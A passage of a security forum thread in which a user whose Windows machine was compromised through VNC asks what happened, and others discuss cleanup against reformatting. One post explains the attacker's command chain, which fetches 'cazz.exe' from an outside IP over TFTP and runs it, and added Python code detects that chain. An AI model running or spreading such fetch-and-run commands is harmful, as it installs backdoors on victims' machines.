
Thread: possible vnc hack

  1. #21
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Maybe TFTP works in Linux, not Windows? I don't have my box in front of me at the moment.

    EDIT: Oops, nope, TFTP works on my XP box. FORMAT or talk to streaker, he's got some pointers on cleaning boxes.
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

  2. #22
    Just burned his ISO
    Join Date
    Jun 2006
    Posts
    12

    Default

    Man... your machine has been compromised... now it could still be there under another name...
    If you read around... many experts recommend a format after being "compromised" because you may never know what else happened to your machine!

    sorry for my english.

  3. #23
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default

    Quote Originally Posted by demente View Post
    Man... your machine has been compromised... now it could still be there under another name...
    If you read around... many experts recommend a format after being "compromised" because you may never know what else happened to your machine!

    sorry for my english.
    I scoff at such 'experts'.

    I just wrote a thread the other day with pretty much all the information you need to clean up your machine without reformatting it.

    It's under the General Information section.
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  4. #24
    Member
    Join Date
    Jan 2007
    Posts
    117

    Angry

    Quote Originally Posted by streaker69 View Post
    I scoff at such 'experts'.

    I just wrote a thread the other day with pretty much all the information you need to clean up your machine without reformatting it.

    It's under the General Information section.
    I'll take a look. I know it can be done and I really loathe formatting lol.

    Maybe TFTP works in Linux, not Windows? I don't have my box in front of me at the moment.

    EDIT: Oops, nope, TFTP works on my XP box. FORMAT or talk to streaker, he's got some pointers on cleaning boxes.
    That's weird... when I type in tftp in the command prompt I get "command cannot be found". Are you sure you didn't install anything extra?

    Edit: wow, that's bizarre. I don't know if it's because I'm running 64bit or what, but tftp is not found as a command on my desktop. I don't know why the attacker would disable or uninstall it... Also, when these commands were run, they all failed. There were 12 command prompt windows and they all said "tftp is not a recognized command".

  5. #25
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Quote Originally Posted by ats1080 View Post
    That's weird... when I type in tftp in the command prompt I get "command cannot be found". Are you sure you didn't install anything extra?
    Positive........

  6. #26
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by streaker69 View Post
    I scoff at such 'experts'.
    I just wrote a thread the other day with pretty much all the information you need to clean up your machine without reformatting it.
    It's under the General Information section.
    I'll scoff at them with you, streaker!
    To ats1080, here is the guide:
    http://forums.remote-exploit.org/showthread.php?t=13110
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #27
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Actually, a funny trick I learned...

    If you have to format someone's drive, keep the wallpaper and put it back after the reformat (if this is a picture of their kids or whatever). This almost "tricks" them into believing it was their old machine. I know it sounds lame, but it works and they feel happy. Even if they have to start reinstalling programs, they think it's "their old machine" just cleaned up.

    But around here we don't have time to dabble into machines; we transfer their shizzola to a good working freshly reimaged one and pick apart the old one on the backend (if it's hardware). Software gets the reimage of doom.

  8. #28
    Member
    Join Date
    Jan 2007
    Posts
    117

    Default

    Quote Originally Posted by spankdidly View Post
    Actually, a funny trick I learned...

    If you have to format someone's drive, keep the wallpaper and put it back after the reformat (if this is a picture of their kids or whatever). This almost "tricks" them into believing it was their old machine. I know it sounds lame, but it works and they feel happy. Even if they have to start reinstalling programs, they think it's "their old machine" just cleaned up.

    But around here we don't have time to dabble into machines; we transfer their shizzola to a good working freshly reimaged one and pick apart the old one on the backend (if it's hardware). Software gets the reimage of doom.
    It's my computer, so it doesn't really matter about the format. I just hate reinstalling apps lol. But did anyone ever figure out what that command is?

  9. #29
    Junior Member unix_r00ter's Avatar
    Join Date
    Feb 2007
    Posts
    64

    Default

    vnc autorooter, old but still going around..

    it sends keys to a vulnerable vnc server and installs the backdoor..
    %comspec% takes you to system32 folder
    /c echo Repairing user32.dll tries to make the program look legit
    tftp -i 201.252.11.200 GET cazz.exe & start cazz&
    well that connects via tftp to the IP and gets the rootkit "cazz.exe" and starts it.
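
The command chain broken down in post #29, turned into a check that can be run over process-creation command lines (an added example, not part of the original thread). The names `analyze` and `SAMPLES` are assumptions for illustration; the first sample is the command as quoted in the thread, and the others are constructed.

```python
import re

# TFTP client syntax: tftp [-i] <host> GET <remote file> [local file]
TFTP_GET = re.compile(
    r'^tftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)(?:\s+(\S+))?$', re.I)
# A stage that runs a program, with or without "start"
RUN = re.compile(r'^(?:start\s+)?"?([^\s"]+)"?$', re.I)


def stem(name):
    """File name without directory or .exe suffix, lower-cased."""
    base = re.split(r'[\\/]', name)[-1].lower()
    return base[:-4] if base.endswith('.exe') else base


def analyze(cmdline):
    """Flag a chained command that fetches a file over TFTP and then runs
    that same file in a later stage. Returns a finding dict or None."""
    # Naive split on '&' (also covers '&&'); quoted ampersands are not handled.
    stages = [s.strip() for s in cmdline.split('&') if s.strip()]
    fetched = None
    for i, stage in enumerate(stages):
        m = TFTP_GET.match(stage)
        if m:
            host, remote, local = m.groups()
            fetched = (i, host, local or remote)
            continue
        if fetched:
            r = RUN.match(stage)
            if r and stem(r.group(1)) == stem(fetched[2]):
                # An echo before the download is the "looks legit" decoy text.
                decoy = any(re.search(r'\becho\b', s, re.I)
                            for s in stages[:fetched[0]])
                return {"host": fetched[1], "file": fetched[2],
                        "decoy_echo": decoy}
    return None


SAMPLES = [
    # As quoted in the thread
    "%comspec% /c echo Repairing user32.dll & "
    "tftp -i 201.252.11.200 GET cazz.exe & start cazz&",
    # Constructed: download only, nothing executed
    "tftp -i 192.0.2.10 GET switch-config.txt",
    # Constructed: download, then an unrelated program
    "tftp -i 192.0.2.10 GET fw.bin & start notepad",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line)
```
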

  10. #30
    Junior Member
    Join Date
    Apr 2007
    Posts
    57

    Default

    Quote Originally Posted by ats1080 View Post
    I'll take a look. I know it can be done and I really loathe formatting lol.

    That's weird... when I type in tftp in the command prompt I get "command cannot be found". Are you sure you didn't install anything extra?

    Edit: wow, that's bizarre. I don't know if it's because I'm running 64bit or what, but tftp is not found as a command on my desktop. I don't know why the attacker would disable or uninstall it... Also, when these commands were run, they all failed. There were 12 command prompt windows and they all said "tftp is not a recognized command".
    Maybe try "tftp.exe" in the CMD/DOS window?

    As for a free VPN, have a look around :

    h***s://secure.logmein.com/products/hamachi/vpn.asp?lang=en

    NOTE the "s" ^^^ as in secure
